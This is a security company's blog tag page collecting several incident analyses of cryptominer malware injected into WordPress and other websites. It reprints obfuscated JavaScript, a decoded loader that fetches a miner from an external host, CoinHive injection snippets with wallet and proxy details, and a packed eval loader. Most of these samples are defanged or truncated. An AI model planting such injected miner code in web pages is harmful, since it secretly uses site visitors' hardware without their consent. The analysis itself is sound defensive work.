Tag: Cryptominers

Obfuscated JavaScript Crypto Miner

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, Crypto Miners were ran on customers visiting the website.

By looking at the following malware this can be discouraging and frightening, but let’s review the malware code and see how the attacker cleverly created Crypto Miner code which was placed into the ./wp-content/themes/responsive/header.php file:

< script >$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")
[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")
[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+
($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")
[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)
[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_.
…...

The attacker placed the code at the top of a legit file. When the website is opened, it executed the JavaScript code and started mining Cryptocurrencies.

Let’s work through the malicious code step by step to see how it works.

The first step is to get the code to make more sense, so we are going to get it in a more readable format.

The malicious code was placed between the opening and closing JavaScript tags as indicated below:

< script >
    $ = ~[];
    $ = {
        ___: ++$,
        $$$$: (![] + "")[$],
        __$: ++$,
        $_$_: (![] + "")[$],
        _$_: ++$,
        $_$$: ({} + "")[$],
        $$_$: ($[$] + "")[$],
        _$$: ++$,
        $$$_: (!"" + "")[$],
        $__: ++$,
        $_$: ++$,
        $$__: ({} + "")[$],
        $$_: ++$,
        $$$: ++$,
        $___: ++$,
        $__$: ++$
    };
.....

Once the obfuscated malware has been decoded, it contained the following JavaScript code that will be used in the next phase of the Cryptocurrency.

If we look at the malicious code, we can see that the variable “el” contains a script object that will be pulling the final Crypto Miner payload from “web[.]clod[.]pw”

var el = document.createElement('script');el.src='https://web[.]clod[.]pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTN…….

In comparison, let’s look at the Crypto Miner payload that was pulled from “web[.]clod[.]pw” and see how it works.

This is a small piece of the malware that was pulled:

var _0xce82=['Y3VycmVudEpvYg==','WGZxVlU=','Z2V0VG90YWxIYXNoZXM=','dmxH','ZlBsVHA=','UmhsVEQ=','Tndoa0k=','RkhQZ2c=','Z2V0QWNjZXB0ZWRIYXNoZXM=','VXZV','WnZa','aHJjYWQ=','anB1cXI=','dGtMSkE=',
…...

Once we decode the content that was pulled from “web[.]clad[.]pw”, we see it contains many functions to check for crawlers and mobile devices and then decides whether it can start the Crypto miners:

if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop
|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i
|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.
(browser|link)|vodafone|wap|windows ce|xda|xiino/i [_0x2ce8('0x7d')](b) || 
/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|
as(te|us)|attw|au(di|\-m|r |s ….

After all the functions have been tested and verified, it will run the Cryptocurrency miner and execute the Crypto miner script by way of your computer hardware.The mining process will start mining Cryptocurrency for the hacker:

if (![]) {
    if (document[_0x2ce8('0xae')][_0x2ce8('0xaf')](/google|yandex|mail|vk.com|ask|bing/) || localStorage[_0x2ce8('0xb0')](_0x2ce8('0xab'))
 || sessionStorage && sessionStorage[_0x2ce8('0xb0')](_0x2ce8('0xab')))
 {
        localStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        sessionStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        runMiner();

    }
} else {
    runMiner();
}
if (document[_0x2ce8('0x1d3')]) {
    var node = document[_0x2ce8('0x1d3')](_0x2ce8('0x1cd'));
    if (node && node[_0x2ce8('0x1d5')]) {
        node[_0x2ce8('0x1d5')]();
    }
}

If you think your website is infected, you can always trust the engineers from Sucuri to check it and clean it for you by visiting and subscribing at https://sucuri.net.

Aug 1, 2018 by Samuel Odendaal

JQuory: Cryptomining in Nulled Themes and Plugins.

Three months ago b>@ninoseki revealed a group of sites with cryptomining scripts inside jquory.js files (yes, jquory instead of jquery).


The attack uses the “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” CoinHive key, takes up 70% of processor time, doesn’t mine on mobile devices and, for some reason, uses the didOptOut function despite the fact that it relies on the coinhive[.]com/lib/coinhive.min.js, which doesn’t involve any opt-out screens.

At the time, PublicWWW had indexed 458 such sites.

That Twitter thread speculated that nulled themes were to blame. Actually, it’s not only nulled themes; nulled WordPress plugins also come with this jquory cryptominer. Below, is what a typical injection in a nulled theme/plugin looks like:

function enqueue_my_scripts() {  wp_enqueue_script( 'wp-internal', 'https://coinhive[.]com/lib/coinhive.min.js', false, false, true );  wp_enqueue_script( 'wp-backend', plugins_url() . '/essential-grid/assets/js/jquory.js', false, false, true );}

As of the beginning of June 2018, we already see 1300 sites with this malicious assets/js/jquory.js script. The “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” site key is still valid and continues to mine Monero

Nulled software is long known for coming with an undisclosed malicious content such as backdoors, unwanted ads, web spam and now cryptominers. Please stay away from pirated themes and plugins if you care about security and reputation of your websites.

Jun 5, 2018 by Denis Sinegubko

Server-level Cryptominer Injections

During an investigation on a recent case, we came across a malware infection that came directly from the server.

Upon further inspection, we found that there were at least two servers showing the same symptom: cryptominers had been automatically injected into every web page after the</head> or </title> tag. The sites themselves had not been infected. The malware was coming from the web server itself, which modifies web pages on the fly. The servers we have identified so far are 5.196.91.117 and 104.243.40.34, with around 60 and 120 sites respectively.

This is the code being injected (line breaks added for readability):


<script src="hxxps://coinhive[.]com/lib/coinhive.min.js"></script><script>CoinHive.CONFIG.WEBSOCKET_SHARDS = [["ws://176.10.104 .249:8892"]];var miner = CoinHive.Anonymous('49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b');</script>

It's a modification of the common CoinHive miner that uses an alternative proxy (176.10.104.249:8892) and mines directly to this Monero address 49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b.

Any webmasters with websites hosted on either of these servers are recommended to check with their hosting provider to resolve the issue.

Jan 22, 2018 by Cesar Anjos

Naive CoinHive Injections

Since CoinHive domain made it into many blacklists, attackers began avoiding linking to the hosted library file https://coinhive .com/lib/coinhive.min.js. Instead, they uploaded this file to third-party sites. Some of the attempts to get rid of the coinhive.com domain look pretty naive. For example, injecting the whole library code into web pages.


Yes! Some attackers inject all 60+ kilobytes of the CoinHive library into the HTML code of infected web pages. It is hard to miss when you visually inspect code of such pages. It was funny to find that in one case the attackers tried to renamed the miner variable into animation to make the code look more acceptable.

On another site, the library was injected into a web page in an obfuscated format that made it even bigger. Again, the attackers went an extra mile to make it look less suspicious. They added this comment

<!--<script src="https://authedmine.com/lib/authedmine.min.js"></script>-->

Authedmine.com - is a version of the CoinHive JavaScript miner that always asks permission to start mining thus considered an acceptable use of a Monero miner on a website. However in the above case, the obfuscated code was not from authedmine - it was the silent coinhive.com version. No wonder the site begins mining coins full speed without any notifications as soon as you open it.

And by the way, when you copy all the CoinHive library code (even obfuscated) to a third-party site it still makes requests to CoinHive domains, so it's easy to detect and block.

For articles about more sophisticated “cryptojacking” hacks please check our blog.

If your site is a victim of such attacks, we can help to clean and protect it.

Dec 20, 2017 by Denis Sinegubko

Fake jQuery and Google Analytics Hide Yet Another...

This is a quick posts about yet another quite massive attack that installs CoinHive JavaScript Monero miners on compromised websites. You might have already read our blog posts on how such attacks were first detected and how they escalated after that.

On Oct 30th, 2017 Microsoft Malware Protection Services tweeted about a new cryptocurrency miner on compromised sites.


The malicious code has a few of interesting features that help obfuscate its true nature:

1. use of a non-dotted decimal notation for the host name: 3104709642(which translates to 185 .14 .28 .10)

  1. quite a common trick of using jQuery name as a script name: hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 (the script actually loads the obfuscated version of the CoinHive library)

  2. use of Google Analytics related variable names (google_analytics, googleanalytics) instead of the suspicious miner, to make it look even more legit.

If you remove the layers of obfuscation, it's still a typical CoinHive mining script that uses the NPRak9QU4lFBSneFt23qEIChh5r0SZev site id for the miner.

We decided to search for compromised sites with this script, but it turned out that the screenshot provided by Microsoft was not version of the script injected to websites. It was an already decoded version of the malicious script. The original code looks like this

eval(function(p,​a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'​.split('|'),0,{​}))

A quick search on PublicWWW revealed 1833 infected websites (as of Nov 22, 2017). We checked quite a few of them - they were all WordPress sites. Moreover, all the infected sites also shared the "cloudflare.solutions" malware (now it loads a keylogger script) that we wrote about this April.

This is a typical WordPress infection and you can use our guide to clean it or have us do it for you.

Nov 24, 2017 by Denis Sinegubko